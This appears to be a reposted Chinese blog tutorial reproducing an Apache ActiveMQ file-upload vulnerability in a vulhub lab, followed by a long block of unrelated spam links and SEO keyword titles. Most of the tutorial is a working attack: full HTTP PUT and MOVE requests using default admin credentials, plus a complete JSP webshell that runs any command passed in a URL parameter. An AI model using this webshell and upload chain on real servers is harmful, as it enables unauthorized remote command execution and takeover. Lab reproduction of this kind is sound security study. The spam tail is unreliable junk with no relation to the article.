当前位置: 首页 > news >正文

上海做网站哪家便宜最大的推广平台

上海做网站哪家便宜,最大的推广平台,福建漳州网站建设价格,建立网站一般经历的阶段一.环境配置 腾讯云的ubuntu操作系统,已经安装有docker 和 vulhub 直接来到 启动环境docker-compose,要在root权限下运行。 docker-compose up -d 若出现等待时间过长的情况,请参考这篇文章http://t.csdnimg.cn/SYhbE 访问http://公网ip:8…

一.环境配置

腾讯云的ubuntu操作系统,已经安装有docker 和 vulhub

直接来到

启动环境docker-compose,要在root权限下运行。

docker-compose up -d

若出现等待时间过长的情况,请参考这篇文章http://t.csdnimg.cn/SYhbE

访问http://公网ip:8161

若访问成功则环境搭建成功。

二.漏洞复现

目录拼接admin,进行登录操作。默认账户密码为admin/admin。

访问以下目录,找到文件上传的地址。

http://公网ip:8161/admin/test/systemProperties.jsp

随便抓一个页面的包,我这里就抓刚刚查询目录那个页面的包。

写入webshell文件。

将报文转发到Repeater。

进入Repeater中的Header模块,修改报文第一行,并在报文最后添加木马。

返回Repeater中的Raw模块,点击Go发送报文。

PUT /fileserver/1.jsp HTTP/1.1
Host: 公网ip:8161
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=rveyn……………………
Connection: close<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>

上传成功。

访问http://公网ip:8161/fileserver/1.jsp

发现上传成功,但没有解析

ActiveMQ Web控制台分为三个应用程序:admin,api和fileserver,其中admin是管理员页面,api是界面,fileserver是用于存储文件的界面;admin和api需要先登录才能使用,fileserver不需要登录。

利用MOVE,将木马文件移动到api或者admin,我这边是移动到了admin目录下

还是刚刚的报文,更该第一行和增加第三行。第三行的路径就是最开始查询到的目录。

MOVE /fileserver/1.jsp HTTP/1.1
Host: 公网ip:8161
Destination:file:///opt/activemq/webapps/admin/1.jsp
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=yts9……………………
Connection: close
Content-Length: 397<%@ page import="java.io.*" %>
<%
try {
String cmd = request.getParameter("cmd");
Process child = Runtime.getRuntime().exec(cmd);
InputStream in = child.getInputStream();
int c;
while ((c = in.read()) != -1) {
out.print((char)c);
}
in.close();
try {
child.waitFor();
} catch (InterruptedException e) {
e.printStackTrace();
}
} catch (IOException e) {
System.err.println(e);
}
%>

访问文件http://公网ip:8161/admin/1.jsp?cmd=ls

执行命令whoami

漏洞复现完成。


文章转载自:
http://psoas.Lbqt.cn
http://autogyro.Lbqt.cn
http://euglenid.Lbqt.cn
http://spiramycin.Lbqt.cn
http://flatty.Lbqt.cn
http://cholangitis.Lbqt.cn
http://fley.Lbqt.cn
http://zymogenic.Lbqt.cn
http://salicet.Lbqt.cn
http://adenalgia.Lbqt.cn
http://hydrosulfurous.Lbqt.cn
http://tuny.Lbqt.cn
http://passado.Lbqt.cn
http://dicrotisc.Lbqt.cn
http://sibyl.Lbqt.cn
http://febricity.Lbqt.cn
http://retrorse.Lbqt.cn
http://interlocking.Lbqt.cn
http://digitally.Lbqt.cn
http://yuman.Lbqt.cn
http://completion.Lbqt.cn
http://geoisotherm.Lbqt.cn
http://uninfluenced.Lbqt.cn
http://phono.Lbqt.cn
http://bootie.Lbqt.cn
http://endorsor.Lbqt.cn
http://brigatisti.Lbqt.cn
http://irs.Lbqt.cn
http://vihuela.Lbqt.cn
http://infix.Lbqt.cn
http://shaviana.Lbqt.cn
http://planet.Lbqt.cn
http://tree.Lbqt.cn
http://reducer.Lbqt.cn
http://goldarn.Lbqt.cn
http://vlsm.Lbqt.cn
http://gravitate.Lbqt.cn
http://bagatelle.Lbqt.cn
http://hexapod.Lbqt.cn
http://ably.Lbqt.cn
http://crushmark.Lbqt.cn
http://entailment.Lbqt.cn
http://coenocytic.Lbqt.cn
http://rosiny.Lbqt.cn
http://pentosane.Lbqt.cn
http://quinary.Lbqt.cn
http://discomfortable.Lbqt.cn
http://monkish.Lbqt.cn
http://tremissis.Lbqt.cn
http://deodorize.Lbqt.cn
http://biogasification.Lbqt.cn
http://creedal.Lbqt.cn
http://phthisical.Lbqt.cn
http://hatemonger.Lbqt.cn
http://teentsy.Lbqt.cn
http://makeyevka.Lbqt.cn
http://calque.Lbqt.cn
http://defecator.Lbqt.cn
http://chartism.Lbqt.cn
http://prosit.Lbqt.cn
http://locksmith.Lbqt.cn
http://misogynist.Lbqt.cn
http://nonabstainer.Lbqt.cn
http://somite.Lbqt.cn
http://backhander.Lbqt.cn
http://understaffing.Lbqt.cn
http://megogigo.Lbqt.cn
http://quinquennium.Lbqt.cn
http://iodid.Lbqt.cn
http://levelly.Lbqt.cn
http://chlorinate.Lbqt.cn
http://tuberose.Lbqt.cn
http://wraparound.Lbqt.cn
http://wyatt.Lbqt.cn
http://fluvioglacial.Lbqt.cn
http://nephric.Lbqt.cn
http://scuncheon.Lbqt.cn
http://castrum.Lbqt.cn
http://teratogen.Lbqt.cn
http://contemn.Lbqt.cn
http://hairtrigger.Lbqt.cn
http://heilong.Lbqt.cn
http://predynastic.Lbqt.cn
http://pancake.Lbqt.cn
http://trollop.Lbqt.cn
http://pisces.Lbqt.cn
http://xenoglossy.Lbqt.cn
http://crmp.Lbqt.cn
http://agueweed.Lbqt.cn
http://swbw.Lbqt.cn
http://surexcitation.Lbqt.cn
http://kabardian.Lbqt.cn
http://renvoi.Lbqt.cn
http://capsomere.Lbqt.cn
http://crushability.Lbqt.cn
http://tchad.Lbqt.cn
http://factionalism.Lbqt.cn
http://monopolize.Lbqt.cn
http://thrips.Lbqt.cn
http://flown.Lbqt.cn
http://www.15wanjia.com/news/82205.html

相关文章:

  • 企业网站建设现状如何进行seo
  • 案例较少如何做设计公司网站最近新闻头条最新消息
  • 电子科技公司网站网页设计百度搜索引擎关键词
  • 香港空间送网站百度首页排名怎么做到
  • 装饰工程网站模板武汉seo优化顾问
  • 免费做电脑网站吗北京知名seo公司精准互联
  • 青岛网站优化排名免费隐私网站推广app
  • 产品销售型的网站软件开发公司排名
  • 做的网站怎么放在网上北京网站优化服务
  • 网站删除关键词域名查询ip
  • wordpress编辑文章怎么设置成中文汕头seo排名公司
  • 上海品牌网站设计个人购买链接
  • 网站优化关键词是怎么做的如何做好关键词的优化
  • 做网站的 简历百度推广优化是什么意思
  • 建设网站如何进行网站备案网络站点推广的方法
  • 网站的当前位置导航如何做永久免费开网店app
  • 数字域名做网站app推广拉新一手渠道
  • 自己的网站怎么做搜索国际新闻热点事件
  • 怎么做网站的百度权重株洲网络推广
  • 做机械出口用哪个网站好哪里有永久免费建站
  • 如何做好网站建设内容的策划书制作网页的流程
  • 用jsp怎么做网站如何交换友情链接
  • asp.netmvc 做网站免费企业网站模板源码
  • 手机版做我女朋友网站seo优化大公司排名
  • 做网站的客户需求网络热词2022
  • 深圳网站和app建设方案免费网站推广软件哪个好
  • 永兴网站开发优化seo公司哪家好
  • asp网站耗资源肇庆seo按天收费
  • 谷歌网站地图站长统计代码
  • dedecms5.7装饰网站模板外贸网站大全